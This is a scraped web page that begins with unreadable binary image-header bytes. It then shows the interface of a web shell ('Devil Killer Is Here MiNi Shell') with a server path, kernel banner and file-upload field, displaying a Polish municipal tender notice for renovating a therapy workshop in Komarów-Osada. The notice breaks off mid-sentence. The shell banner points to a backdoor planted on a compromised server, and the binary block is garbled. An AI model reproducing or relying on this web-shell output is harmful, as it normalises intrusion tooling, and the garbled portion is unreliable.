JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210728/0013015501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00130155 z dnia 2021-07-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont budynku Warsztatu Terapii Zajęciowej w Komarowie-Osadzie z siedzibą w Wolicy Brzozowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KOMARÓW-OSADA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950368500</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Komarów-Osada</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-435</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">84 615 31 02</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">84 615 31 85</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">poczta@komarow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.komarow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont budynku Warsztatu Terapii Zajęciowej w Komarowie-Osadzie z siedzibą w Wolicy Brzozowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-40af0f51-efdc-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00130155</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00111479/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Remont budynku Warsztatu Terapii Zajęciowej w Komarowie-Osadzie z siedzibą w Wolicy Brzozowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://komarow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://komarow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu lub<br/>konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym<br/>a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp., odbywa się przy użyciu<br/>środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki<br/>komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą<br/>elektroniczną. .Ofertę, oświadczenia, podm. środki dowod,, pełnomocnictwa, zobow. podmiotu udost.<br/>zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w<br/>szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa<br/>w Rozd. X ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej, opatrzone<br/>kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym. 2. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy<br/>przekazują:3.1. drogą elektroniczną: poczta@komarow.pl; lub3.2. poprzez Platformę, dostępną pod<br/>adresem: https://komarow.ezamawiajacy.pl 3. Rejestracja na Platformie, w tym złożenie oferty w formie<br/>elektronicznej, wymaga: posiadania konta na Marketplanet OnePlace. 4. Rejestracja i korzystanie z<br/>Platformy. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie<br/>Gmina Komarów-Osada, https://komarow.ezamawiajacy.pl lub https.://oneplace.marketplanet.pl.5.<br/>Zgodnie z 67 ustawy Pzp., Zamawiający podaje wymagania techn. związane z korzystaniem z<br/>Platformy:6.1. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s; a. Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel<br/>IV2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x10.4, Linux, lub ich nowsze wersje;b. Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w<br/>najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;c. Włączona obsługa<br/>JavaScript;d. Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie.pdf. 6.2.<br/>Zamawiający określa dopuszczalny format podpisu elektronicznego, jako:a. dokumenty w formacie<br/>„pdf” zaleca się podpisywać formatem PAdeS,b. dopuszcza się podpisanie dokumentów w formacie<br/>innym niż „pdf”, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca<br/>będzie zobowiązany załączyć prócz podpisanego dokumentu oddzielny plik z podpisem.6.3.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi do 80 MB. Zamawiający<br/>zaleca w szczególności następujące formaty przesyłanych danych: pdf, doc, docx, zip, 7z . Dopuszcza<br/>się następujące formaty przesyłanych danych: xml, txt, rtf, xps, odt, ods, odp, xls, ppt, xlsx, pptx, csv,<br/>jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv,tar, gz, gzip,<br/>html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdeS, CAdeS, ASIC, XMLenc.6.4.<br/>Kodowanie określono w SWZ6.5. Zam. inf., iż w przypadku jakichkolwiek wątpliwości związanych z<br/>zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania<br/>teleinformatycznego Platformy zakupowej Gminy Komarów-Osada tel. +48 22 257 22 23) email:<br/>oneplace@marketplanet.pl.6.6. Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z Marketplanet OnePlace.<br/>Regulamin znajduje się na stronie: https://oneplace.marketplanet.pl/regulamin6. W korespondencji<br/>należy posługiwać się numerem postępowania. 7. Wyk. może zwrócić się do zam. o wyjaśnienie SWZ.<br/>Wniosek należy przesłać za pośrednictwem poczty elektronicznej e-mail: poczta@komarow.pl lub na<br/>Platformie Zakupowej: https://komarow.ezamawiajacy.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny wynikający z art.13 RODO w<br/>przypadku zbierania danych osobowych bezpośrednio od osoby fizycznej, której dane dotyczą, w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE<br/>(ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Zamawiający;<br/>2. Dane kontaktowe inspektora ochrony danych osobowych w Urzędzie Gminy Komarów-Osada ul.<br/>Rynek15, 22-435 Komarów-Osada: inspektor@cbi24.pl;<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Remont budynku Warsztatu Terapii Zajęciowej w Komarowie-Osadzie z siedzibą w Wolicy Brzozowej”;<br/>4. Odbiorcami Pani/Pana danych osobowych będą upoważnieni pracownicy Urzędu Gminy Komarów-<br/>Osada oraz spółka Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672) przy ul.<br/>Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego,<br/>prowadzonego przez Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział Gospodarczy<br/>Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON: 017282436, NIP: 526-25-<br/>35-153, jako właściciel Platformy Zakupowej, na której Nazwa Jednostki prowadzi postępowania o<br/>udzielenie zamówienia publicznego, działającą pod adresem: https://komarow.ezamawiajacy.pl oraz<br/>odpowiednie organy kontroli w zakresie ich kompetencji;<br/>5. Dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy. Dane te mogą być przechowywane przez okres dłuższy niż wskazany, o ile wynika to z ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i<br/>archiwach (t.j. Dz. U. z 2018 r. poz. 217 z późn. zm.) i przepisów wykonawczych do tej ustawy;<br/>6. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach<br/>ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy PZP;<br/>7. W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany.<br/>8. Prawa osób których dane są przetwarzane:<br/>• prawo dostępu do danych osobowych;<br/>• prawo do sprostowania danych osobowych (Wyjaśnienie: skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania);<br/>• prawo żądania od administratora ograniczenia przetwarzania danych osobowych (prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego);<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy;<br/>• nie przysługuje Pani/Panu:<br/>• prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych;<br/>• prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych jest konieczność wypełnienia obowiązku prawnego ciążącego na zamawiającym<br/>lub wykonanie umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IRFZ.271.3.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Remont budynku Warsztatu Terapii Zajęciowej w Komarowie-Osadzie z siedzibą w Wolicy Brzozowej. <br/>2. Szczegółowy opis przedmiotu zamówienia oraz zakres prac - zgodnie z: przedmiarem robót stanowiącym załącznik nr 7 do SWZ oraz wzorem umowy stanowiącym załącznik nr 6 do SWZ. <br/>3. Przedmiot zamówienia obejmuje w szczególności: <br/>1) Obsługę geodezyjną, <br/>2) Wykonanie robót budowlanych i montażowych w tym: <br/>Posadzki, tynki, okładziny stolarka okienna i drzwiowa, zabudowy meblowe, roboty sanitarne, instalacje elektryczne, wymiana grzejników.<br/>3) przygotowanie dokumentów związanych z uzyskaniem pozwolenia na użytkowanie, <br/>4) inwentaryzację i dokumentacje powykonawczą w tym geodezyjną. <br/>4. Przedmiary robót są podstawą sporządzenia oferty przez Wykonawcę wyceny wraz ze wszystkimi elementami opisanych w SWZ. Przed sporządzeniem oferty należy zweryfikować podane przedmiary i zakres prac do wykonania. <br/>5. Wspólny Słownik Zamówień – CPV: <br/>45000000-7<br/>6. Zaleca się, aby Wykonawca przed sporządzeniem oferty dokonał wizji lokalnej terenu objętego zamówieniem i jego otoczenia, a także zdobył na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz podpisania umowy i wykonania zamówienia. Koszt dokonania wizji lokalnej terenu budowy ponosi Wykonawca. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt. 7 ustawy Pzp w wysokości do 10 % całkowitej wartości zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejszą ofertą będzie oferta, która przedstawia<br/>najkorzystniejszy bilans ceny i innych kryteriów odnoszących się do przedmiotu zamówienia<br/>publicznego</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie stawia wymagań w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów ;<br/>Zamawiający nie stawia szczegółowego warunku w tym zakresie.<br/>3) w zakresie sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie stawia szczegółowego warunku w tym zakresie.<br/>4) w zakresie zdolności technicznej lub zawodowej<br/>a) Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie,<br/>- co najmniej dwie (2) roboty budowlane, z których każda polegała na remoncie, przebudowie lub budowie budynku lub innej zbliżonej zakresem do<br/>przedmiotowego postępowania o wartości robót co najmniej 200.000,00 zł brutto (słownie:<br/>dwieście tysięcy złotych 00/100), każda z wykazanej roboty budowlanej.<br/>Wykonawca winien załączyć dowody potwierdzające, że roboty te zostały wykonane należycie.<br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez<br/>podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne dokumenty.<br/>b) Zamawiający uzna warunek za spełniony w tym zakresie, jeżeli Wykonawca wykaże, że<br/>dysponuje lub będzie dysponował osobami zdolnymi do realizacji zamówienia, posiadającymi<br/>niezbędne kwalifikacje tj:<br/>- Kierownikiem budowy (1 osoba) posiadająca co najmniej:<br/>- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjnobudowlanej<br/>oraz min. 3- letnie doświadczenie w zakresie kierowania budowami;<br/>UWAGA: Jeżeli Zamawiający wymaga określonych uprawnień budowlanych (w tym<br/>przynależności do określonego samorządu zawodowego) na podstawie aktualnie obowiązującej<br/>ustawy z dnia 7 lipca 1994 r. – Prawo budowlane (t.j. Dz.U. z 2020 r., poz. 1333 ze zm.),<br/>rozumie się przez to również odpowiadające im ważne uprawnienia budowlane, wydane na<br/>podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów prawa<br/>państw członkowskich Unii Europejskiej, konfederacji Szwajcarskiej lub państw członkowskich<br/>Europejskiego Porozumienia o Wolnym Handlu (EFTA) – stron umowy o Europejskim Obszarze<br/>Gospodarczym, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub<br/>określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w<br/>ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2020 r., poz. 220 ze zm.).<br/>UWAGA: Zamawiający wymaga, aby osoby kierujące robotami budowlanymi posiadały<br/>uprawienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie, w<br/>odpowiednich specjalnościach dla poszczególnych branż objętych zakresem zamówienia.<br/>Na potwierdzenie spełnienia warunku, Wykonawca składa oświadczenie, że osoby które będą<br/>uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia.<br/>Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na<br/>podstawie wykazu osób zdolnych do wykonania zamówienia, stanowiącego załącznik do SWZ.<br/>Osoby wchodzące w skład personelu Wykonawcy muszą posiadać biegłą znajomość języka<br/>polskiego. W przypadku, osoby wchodzące w skład personelu Wykonawcy nie posiadają biegłej dla potrzeb i na okres realizacji zamówienia.<br/>2. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu,<br/>polegać na zdolnościach technicznych lub zawodowych lub sytuacji ekonomicznej lub<br/>finansowej podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków<br/>prawnych.<br/>3. W odniesieniu do warunków dotyczących doświadczenia wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia Wykonawcy mogą polegać na zdolnościach innych podmiotów<br/>udostępniających zasoby, jeśli podmioty te wykonują roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>4. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, udostępniających<br/>zasoby, składa wraz z wnioskiem o dopuszczenie do udziału w postępowaniu albo odpowiednio<br/>wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów.<br/>5. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. 3, potwierdza że<br/>stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty<br/>dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>3) czy i w 